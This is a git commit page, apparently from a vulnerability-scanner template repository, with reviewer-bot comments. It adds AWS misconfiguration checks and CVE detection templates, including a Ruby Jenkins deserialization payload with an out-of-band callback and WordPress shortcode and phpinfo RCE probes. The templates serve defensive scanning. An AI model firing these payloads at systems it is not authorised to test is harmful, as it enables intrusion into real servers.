Merge branch 'main' into main

patch-13
aayush2561 2024-10-28 14:19:18 +05:45 committed by GitHub
commit 650e8fda9a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
18 changed files with 789 additions and 8 deletions


@ -1,3 +1,9 @@
cloud/aws/dms/dms-multi-az.yaml
cloud/aws/dms/dms-public-access.yaml
cloud/aws/dms/dms-version-upgrade.yaml
cloud/aws/ebs/ebs-encryption-disabled.yaml
cloud/aws/firehose/firehose-server-destination-encryption.yaml
cloud/aws/firehose/firehose-server-side-encryption.yaml
dast/cves/2024/CVE-2024-2961.yaml
http/cnvd/2024/CNVD-2024-38747.yaml
http/cves/2015/CVE-2015-8562.yaml
@ -25,6 +31,7 @@ http/cves/2023/CVE-2023-40931.yaml
http/cves/2023/CVE-2023-43373.yaml
http/cves/2023/CVE-2023-5558.yaml
http/cves/2023/CVE-2023-5561.yaml
http/cves/2024/CVE-2016-9299.yaml
http/cves/2024/CVE-2024-22476.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
@ -43,17 +50,22 @@ http/cves/2024/CVE-2024-48914.yaml
http/cves/2024/CVE-2024-49757.yaml
http/cves/2024/CVE-2024-5910.yaml
http/cves/2024/CVE-2024-8698.yaml
http/cves/2024/CVE-2024-9061.yaml
http/cves/2024/CVE-2024-9234.yaml
http/cves/2024/CVE-2024-9593.yaml
http/cves/2024/CVE-2024-9617.yaml
http/cves/2024/CVE-2024-9796.yaml
http/default-logins/apache/doris-default-login.yaml
http/default-logins/sato/sato-default-login.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/1password-scim-panel.yaml
http/exposed-panels/danswer-panel.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/nagios/nagios-logserver-panel.yaml
http/exposed-panels/olympic-panel.yaml
http/exposed-panels/onedev-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
http/exposed-panels/reolink-panel.yaml
http/exposed-panels/sqlpad-panel.yaml
http/exposed-panels/traccar-panel.yaml
http/exposed-panels/txadmin-panel.yaml
@ -72,6 +84,7 @@ http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/salesforce-b2c-commerce-webdav.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
http/vulnerabilities/nagios/nagios-xi-xss.yaml
http/vulnerabilities/wordpress/application-pass-xss.yaml
http/vulnerabilities/wordpress/wp-footnote-xss.yaml


@ -0,0 +1,59 @@
id: dms-multi-az
info:
name: DMS Multi-AZ Not Enabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) replication instances are using Multi-AZ deployment configurations to provide High Availability (HA) through automatic failover to standby replicas in the event of a failure such as an Availability Zone (AZ) outage, an internal hardware or network outage, a software failure or in case of a planned maintenance session
impact: |
Not enabling Multi-AZ for Database Migration Service can lead to increased downtime and data loss risks during outages, compromising the availability and reliability of your database operations.
remediation: |
Enable Multi-AZ support for your Database Migration Service to enhance availability and resilience, ensuring automatic failover and reducing downtime during outages.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/multi-az.html
- https://docs.aws.amazon.com/cli/latest/reference/dms/describe-replication-instances.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].MultiAZ" --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- '"DMS Multi-AZ " + replication + " is not enabled"'
# digest: 4a0a004730450220052c0de2e02b60b42a79e7d02c2e38f90423664ca041b2dddd276b0f0b55d3fa022100a434388c051cee8dfa5e4d962699aa4abdc66971013a62f1cc3c85a9c434519b:922c64590222798bb761d5b6d8e72950
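Review bot: A failed first `aws dms describe-replication-instances` call (no credentials, denied permission, CLI missing) leaves the `replications` extractor empty, so the `flow` loop never runs and the template reports nothing, which looks the same as a compliant account. A matcher or a documented note on the first `code` step would make an enumeration failure distinguishable from a clean result. The `region: "us-west-2"` default also means only one region is audited unless the caller overrides it, so I would add a comment such as `# only this region is checked; override with -var region=<REGION>`. The same two points apply to dms-public-access, dms-version-upgrade, ebs-encryption-disabled and both firehose templates in this commit.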


@ -0,0 +1,59 @@
id: dms-public-access
info:
name: Publicly Accessible DMS Replication Instances
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) are not publicly accessible from the Internet in order to avoid exposing private data and minimize security risks.
impact: |
Publicly accessible DMS replication instances expose your database to unauthorized access and potential attacks, increasing the risk of data breaches and compromising the security of sensitive information.
remediation: |
Restrict access to your DMS replication instances by configuring security groups and network access controls to allow connections only from trusted IP addresses and private subnets, ensuring that they are not publicly accessible.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/publicly-accessible.html
- https://docs.aws.amazon.com/dms/latest/userguide/CHAP_ReplicationInstance.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].PubliclyAccessible" --output json
matchers:
- type: word
words:
- "true"
extractors:
- type: dsl
dsl:
- '"DMS Replication Instances " + replication + " Publicly Accessible"'
# digest: 4b0a00483046022100c2e4b02073095257867ae2f880894485ce4395d427a0f5797433d453d16557b4022100f11bea387537d175614dcbe4c0e1f7a3d19cfe18b2eb5177157de179677aaea4:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,59 @@
id: dms-version-upgrade
info:
name: DMS Auto Minor Version Upgrade
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) replication instances have the Auto Minor Version Upgrade feature enabled in order to receive automatically minor engine upgrades.
impact: |
Not enabling DMS Auto Minor Version Upgrade can lead to running outdated database versions, increasing vulnerability to security risks and bugs, while missing out on performance improvements and new features provided in minor updates.
remediation: |
Enable DMS Auto Minor Version Upgrade to automatically apply minor version updates, ensuring your database is always up-to-date with the latest security patches, performance enhancements, and bug fixes.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/auto-minor-version-upgrade.html
- https://docs.aws.amazon.com/cli/latest/reference/dms/index.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].AutoMinorVersionUpgrade" --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- '"DMS Auto Minor Version Upgrade " + replication + " not enabled"'
# digest: 4b0a00483046022100e170aa216555156ddf46a196e60d6985d37d29f32146f0bfeaeef1ceba09e73c022100f95487bc9c2f2bfe9288a9362f868268f3bb7cd963b36c44be1b6629a06b3a6b:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,61 @@
id: ebs-encryption-disabled
info:
name: EBS Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that all your Amazon Elastic Block Store (EBS) volumes are encrypted in order to meet security and compliance requirements. With encryption enabled, your EBS volumes can hold sensitive, confidential, and critical data.
impact: |
Disabling AWS EBS encryption exposes sensitive data to unauthorized access, increasing the risk of data breaches and compliance violations.
remediation: |
Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/EBS/ebs-encrypted.html
- http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html
tags: cloud,devops,aws,amazon,ebs,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let VolumesVolumeId of iterate(template.volumes)){
set("volume", VolumesVolumeId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws ec2 describe-volumes --region $region --query 'Volumes[*].VolumeId' --output json
extractors:
- type: json
name: volumes
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws ec2 describe-volumes --region $region --volume-ids $volume --query 'Volumes[*].Encrypted' --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"EBS Encryption " + volumes + " is Disabled"'
# digest: 4a0a00473045022100fe98ba08fe06c9398f905a0651ac60c5cfbdbeaf2fa0c524aa9d2c0e29d3c75902200ab089e32558f42e2a7f8d5fafb3e309dfe261bad4e417532734222a7cbaa7cf:922c64590222798bb761d5b6d8e72950
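Review bot: The DSL extractor at the end of the second `code` step concatenates `volumes`, which is the name of the internal JSON extractor holding the whole ID list, while the `flow` block stores the current item with `set("volume", VolumesVolumeId)`. The finding text therefore probably does not name the single unencrypted volume; the other templates in this commit use the per-iteration variable. The line should read `- '"EBS Encryption " + volume + " is Disabled"'`. The second reference also uses `http://docs.aws.amazon.com/...` where the other references use `https://`.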


@ -0,0 +1,59 @@
id: firehose-server-destination-encryption
info:
name: Firehose Delivery Stream Destination Encryption - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Kinesis Firehose delivery stream data records are encrypted at destination (i.e. Amazon S3) in order to meet regulatory requirements and protect your Firehose data at rest.
impact: |
Disabling encryption for Firehose delivery stream destinations can lead to sensitive data being stored unencrypted, increasing the risk of data exposure and unauthorized access.
remediation: |
Enable encryption for Firehose delivery stream destinations to ensure that all data is encrypted at rest, safeguarding sensitive information from unauthorized access and potential data breaches.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-destination-encryption.html
- https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DeliveryStreamNames of iterate(template.deliverys)){
set("delivery", DeliveryStreamNames)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
extractors:
- type: json
name: deliverys
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration' --output json
matchers:
- type: word
words:
- "NoEncryption"
extractors:
- type: dsl
dsl:
- '"Firehose Delivery Stream Destination " + delivery + " Encryption is Disabled"'
# digest: 490a0046304402201742209d94926b372dbccead7a059d88a973ed2020c9a79e7015331a3e66b20002206a6c98cac36c76d372585674da6f65d3dd50ee0053363cb2f9ffeefa9bf88460:922c64590222798bb761d5b6d8e72950
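Review bot: The second `code` step only queries `Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration`, so a delivery stream whose destination is not extended S3 returns no encryption block and can never match `NoEncryption`. Such streams are silently treated as passing. If that scope is intended, state it in `description`, for example `Only Extended S3 destinations are evaluated; other destination types are not checked.`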


@ -0,0 +1,59 @@
id: firehose-server-side-encryption
info:
name: Firehose Delivery Stream Server-Side Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that your Amazon Kinesis Data Firehose delivery streams are encrypted using Server-Side Encryption.
impact: |
Disabling server-side encryption for Firehose delivery streams can result in unencrypted data being stored, exposing sensitive information to unauthorized access and increasing the risk of data breaches.
remediation: |
Enable server-side encryption for Firehose delivery streams to ensure that data is securely encrypted at rest, protecting sensitive information from unauthorized access.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-encrypted-with-kms-customer-master-keys.html
- https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DeliveryStreamNames of iterate(template.deliverys)){
set("delivery", DeliveryStreamNames)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
extractors:
- type: json
name: deliverys
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.DeliveryStreamEncryptionConfiguration.KeyType' --output json
matchers:
- type: word
words:
- "null"
extractors:
- type: dsl
dsl:
- '"Firehose delivery stream " + delivery + " is not encrypted using SSE"'
# digest: 4a0a00473045022100c27f022ba1deaf796d3a13a7fff3ccc19f5c8ccafb2406a5632741e33645b130022018b443d8917635142e697c54efccbdd18fd4873b7cc9fdebac19537f0ddbcdf7:922c64590222798bb761d5b6d8e72950
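Review bot: The matcher decides "not encrypted" from `DeliveryStreamEncryptionConfiguration.KeyType` printing `null`, which is an indirect signal. The same structure carries a `Status` field, and a stream whose encryption is disabled or failed while `KeyType` is still populated would presumably be missed; querying `DeliveryStreamEncryptionConfiguration.Status` and matching on anything other than `ENABLED` would be more direct. The second reference points at the S3 KMS guide rather than Firehose documentation, which does not describe the setting this template checks.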


@ -2717,10 +2717,13 @@
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
{"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
{"ID":"CVE-2024-9061","Info":{"Name":"WP Popup Builder Popup Forms and Marketing Lead Generation \u003c= 1.3.5 - Arbitrary Shortcode Execution","Severity":"high","Description":"The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-9061.yaml"}
{"ID":"CVE-2024-9234","Info":{"Name":"GutenKit \u003c= 2.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9234.yaml"}
{"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"}
{"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"high","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"}
{"ID":"CVE-2024-9593","Info":{"Name":"Time Clock \u003c= 1.2.2 \u0026 Time Clock Pro \u003c= 1.1.4 - Remote Code Execution","Severity":"high","Description":"The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-9593.yaml"}
{"ID":"CVE-2024-9617","Info":{"Name":"Danswer - Insecure Direct Object Reference","Severity":"medium","Description":"The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-9617.yaml"}
{"ID":"CVE-2024-9796","Info":{"Name":"WordPress WP-Advanced-Search \u003c= 3.3.9 - SQL Injection","Severity":"critical","Description":"The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9796.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}


@ -1 +1 @@
13888324a39d31ce90973d926d640532
2d385a9a80b48d960e7e3c78bad06e09


@ -0,0 +1,123 @@
id: CVE-2016-9299
info:
name: Jenkins CLI - HTTP Java Deserialization
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
- https://nvd.nist.gov/vuln/detail/CVE-2016-9299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-9299
cwe-id: CWE-90
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
metadata:
max-request: 1
verified: true
vendor: jenkins
product: jenkins
shodan-query: product:"jenkins"
fofa-query: icon_hash=81586312
tags: cve,cve2016,rce,deserialization
variables:
oast: "{{interactsh-url}}"
code:
- engine:
- rb
- ruby # requires ruby to be pre-installed on system running nuclei
source: |
require 'socket'
require 'base64'
# Define environment variables for host details (make sure they are properly set in your environment)
$Hostname = ENV['Hostname']
$Host = ENV['Host']
$Port = ENV['Port']
interactsh = (ENV['oast']).ljust(45,'/')
url_dns = "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"
$decoded_url_dns = [url_dns].pack("H*")
$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh
# Step 1: Send the download request without waiting for a response or closing the socket
def send_download_request(host, port)
download_socket = TCPSocket.new(host, port)
download_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0\r\n
REQ
#puts "Sending Download Request..."
download_socket.write(download_request)
# Return the open socket so we can read from it later
return download_socket
end
# Step 2: Send the upload request
def send_upload_request(host, port)
socket = TCPSocket.new(host, port)
# Base64 decoded payload for upload request
chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns
upload_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: upload
Content-Type: application/octet-stream
Content-Length: #{chunked_payload.bytesize}\r\n
REQ
#puts "Sending Upload Request..."
socket.write(upload_request)
# Send the binary data (payload)
socket.write(chunked_payload)
# Read and print the response for the upload request
response = socket.readpartial(1024)
#puts "Received from server (upload response): #{response}"
# Close the socket for upload request
socket.close
end
# Step 3: After upload request, read the download request's response
def read_download_response(socket)
#puts "Reading Download Request Response..."
response = socket.readpartial(1024)
socket.close
response
end
# Combined steps to perform the operations in the required order
# Step 1: Send download request (don't wait for response, keep the socket open)
download_socket = send_download_request($Host, $Port)
# Step 2: Send upload request
send_upload_request($Host, $Port)
# Print the download response
puts read_download_response(download_socket)
matchers:
- type: dsl
dsl:
- "contains(response,'hudson.remoting.UserRequest')"
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950
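Review bot: `$decoded_url_dns.gsub!` returns `nil` when the placeholder host is not found, so the assignment can set `$decoded_url_dns` to `nil` and the concatenation in `send_upload_request` then raises; the non-bang form, `$decoded_url_dns = $decoded_url_dns.gsub("<placeholder-host>", interactsh)`, keeps the string. Both `socket.readpartial(1024)` calls have no timeout and raise `EOFError` when the peer closes first, so a target that is not Jenkins can stall or abort the script instead of yielding a clean negative. `ENV['oast']` is also dereferenced without a nil check. Separately, the .new-additions list in this commit places the file at `http/cves/2024/CVE-2016-9299.yaml`, which files a 2016 CVE under the 2024 directory.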


@ -46,5 +46,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502207d49c3297e84b73e97ee50057e586be8609be53b012523511299887a50cad877022100b4437a3ff67854693adb66be76d5b30547c18a9596223a06685fa02932bbc805:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b4f85fbe7f82396cb84d4980b7cab502297c575cda88ad470169b72b87f641cf022100b3da53c83ed560855d843013d6f9ea158f906252de2100fcb836ccf154283dc8:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,61 @@
id: CVE-2024-9061
info:
name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
author: s4e-io
severity: high
description: |
The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9061
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
- https://github.com/RandomRobbieBF/CVE-2024-9061
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-9061
cwe-id: CWE-94
epss-score: 0.00046
epss-percentile: 0.18015
metadata:
max-request: 2
verified: true
vendor: themehunk
product: wp-popup-builder
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-popup-builder/"
tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/wp-popup-builder")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31
matchers:
- type: dsl
dsl:
- 'len(body) == 13'
- 'contains(body, "CVE-2024-9061")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100f80fec38e7c5f649695bac35530600b4fbfa1daa9782d746571908c193ec333d022100f9b434ac3748d54c493f2ad2d7bf045e53c97e1abd079858c054b0ce2f03e0e5:922c64590222798bb761d5b6d8e72950
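Review bot: The `info` block has no `remediation` field, so a finding tells the operator what is wrong but not what to do; the AWS templates in this same commit all carry one. Since the description states that all versions up to and including 1.3.5 are affected, something like `remediation: Update WP Popup Builder to a version later than 1.3.5, or deactivate the plugin until it is updated.` would fit. The description also opens with a doubled "The The". CVE-2024-9593, CVE-2024-9796 and hcm-cloud-lfi in this commit lack `remediation` as well.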


@ -0,0 +1,72 @@
id: CVE-2024-9593
info:
name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
author: s4e-io
severity: high
description: |
The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
- https://nvd.nist.gov/vuln/detail/CVE-2024-9593
- https://github.com/RandomRobbieBF/CVE-2024-9593
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id: CVE-2024-9593
cwe-id: CWE-94
epss-score: 0.00052
epss-percentile: 0.21567
metadata:
max-request: 2
verified: true
vendor: scott_paterson
product: time-clock & time-clock-pro
framework: wordpress
fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/time-clock")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
function=phpinfo
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a00473045022065893bee95b4cb863eb698bc33aef1849b6971633dc55d38e63de16d89b20d8e022100916a86a5a8ba50bef07761ba790afe74cf0ab95d95dfc115f03e95f72a607648:922c64590222798bb761d5b6d8e72950
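Review bot: `product: time-clock & time-clock-pro` puts two products and an ampersand into a metadata field that the other templates in this commit fill with a single identifier (`wp-popup-builder`, `wp-advanced-search`, `jenkins`). Tooling that keys on `product` will likely not match either plugin. I would use `product: time-clock` and mention Time Clock Pro in the description, which already covers both.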


@ -0,0 +1,51 @@
id: CVE-2024-9796
info:
name: WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection
author: s4e-io
severity: critical
description: |
The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/
